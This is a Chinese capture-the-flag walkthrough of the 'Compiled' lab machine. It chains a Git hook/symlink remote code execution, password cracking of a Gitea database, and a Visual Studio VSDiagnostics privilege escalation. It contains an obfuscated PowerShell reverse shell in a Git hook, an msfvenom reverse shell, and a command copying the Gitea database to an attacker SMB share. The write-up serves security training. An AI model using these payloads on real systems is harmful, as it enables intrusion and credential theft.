[Meachines] [Medium] Compiled Git-RCE+Visual Studio 2019权限提升
字数 1057 2025-08-20 18:17:53
Git-RCE + Visual Studio 2019 权限提升漏洞利用教学文档
1. 信息收集阶段
1.1 目标扫描
- 目标IP: 10.10.11.26
- 开放端口:
- 3000: Gitea服务
- 5000: 代码编译服务(Werkzeug/3.0.3 Python/3.12.3)
- 5985: WinRM服务
1.2 服务识别
- Gitea服务: http://10.10.11.26:3000/
- 代码编译服务: http://10.10.11.26:5000/
- 特定仓库: http://10.10.11.26:3000/richard/Calculator
2. Git远程代码执行漏洞利用
2.1 漏洞原理
利用Git的post-checkout钩子和符号链接特性实现远程代码执行。
2.2 利用步骤
-
准备两个仓库
git config --global protocol.file.allow always git config --global core.symlinks true git config --global init.defaultBranch main rm -rf nothing rm -rf toSeeHere -
创建第一个仓库(repo1)并添加恶意钩子
git clone http://10.10.11.26:3000/test/repo1.git cd repo1 mkdir -p y/hooks -
创建恶意post-checkout脚本
cat >y/hooks/post-checkout <<EOF #!bin/sh.exe powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAAxADAAMAAzADIAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git push -
创建第二个仓库(repo2)并添加符号链接
cd .. git clone http://10.10.11.26:3000/test/repo2.git cd repo2 git submodule add --name x/y "http://10.10.11.26:3000/test/repo1.git" A/modules/x git commit -m "add-submodule" printf ".git" >dotgit.txt git hash-object -w --stdin <dotgit.txt >dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info git update-index --index-info <index.info git commit -m "add-symlink" git push -
触发漏洞
./rev.sh http://10.10.11.26:5000/
3. 获取初始访问权限
3.1 获取Gitea数据库
-
设置SMB共享:
impacket-smbserver share /tmp/ -smb2support -
从目标机器复制数据库:
cp 'C:\\Program Files\Gitea\data\gitea.db' \\10.10.16.75\share
3.2 破解用户密码
-
使用Python脚本破解PBKDF2哈希:
import hashlib import binascii def derive_pbkdf2_key(candidate, salt, rounds=50000, key_length=50): return hashlib.pbkdf2_hmac( 'sha256', candidate.encode('utf-8'), salt, rounds, key_length ) def attempt_password_crack(wordlist_path, target_hash, salt_value, rounds=50000, key_length=50): target_hash_bytes = binascii.unhexlify(target_hash) try: with open(wordlist_path, 'r', encoding='utf-8') as wordlist: for entry in wordlist: candidate_password = entry.strip() derived_key = derive_pbkdf2_key(candidate_password, salt_value, rounds, key_length) if derived_key == target_hash_bytes: print(f"Password match found: {candidate_password}") return candidate_password except FileNotFoundError: print("Wordlist file not found. Please check the path.") return None print("No matching password found.") return None salt_value = binascii.unhexlify('227d873cca89103cd83a976bdac52486') target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16' wordlist_path = '/usr/share/wordlists/rockyou.txt' attempt_password_crack(wordlist_path, target_hash, salt_value) -
发现密码:
12345678
3.3 通过WinRM登录
evil-winrm -i 10.10.11.26 -u 'emily' -p '12345678'
- 获取user flag:
209380d1c60e610f2cef026e0c237404
4. 权限提升(Visual Studio 2019漏洞)
4.1 漏洞利用准备
-
生成反向shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.75 LPORT=4444 -f exe -o reverse_shell.exe -
设置监听:
msfconsole use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.10.16.75 set LPORT 4444 run
4.2 查找VSDiagnostics.exe路径
dir C:\VSDiagnostics.exe /s /p
4.3 利用CVE-2024-20656
-
下载利用工具:
cp \\10.10.16.75\share\RunasCs.exe . cp \\10.10.16.75\share\Expl.exe . copy \\10.10.16.75\share\reverse_shell.exe . -
执行提权:
./RunasCs.exe emily 12345678 ./Expl.exe -
获取root flag:
4910be87423e9b471cc4945f1e5fed7f
5. 关键点总结
-
Git RCE漏洞利用:
- 利用Git钩子和符号链接特性
- 需要创建两个相互关联的仓库
- 通过代码编译服务触发
-
密码破解:
- 获取Gitea数据库文件
- 识别PBKDF2哈希算法参数
- 使用rockyou.txt字典破解
-
权限提升:
- 利用Visual Studio 2019的VSDiagnostics.exe漏洞
- 需要替换MofCompiler.exe文件
- 使用RunasCs工具执行提权操作
-
工具使用:
- impacket-smbserver: 文件传输
- evil-winrm: Windows远程管理
- msfvenom: 生成payload
- RunasCs: 以其他用户身份执行命令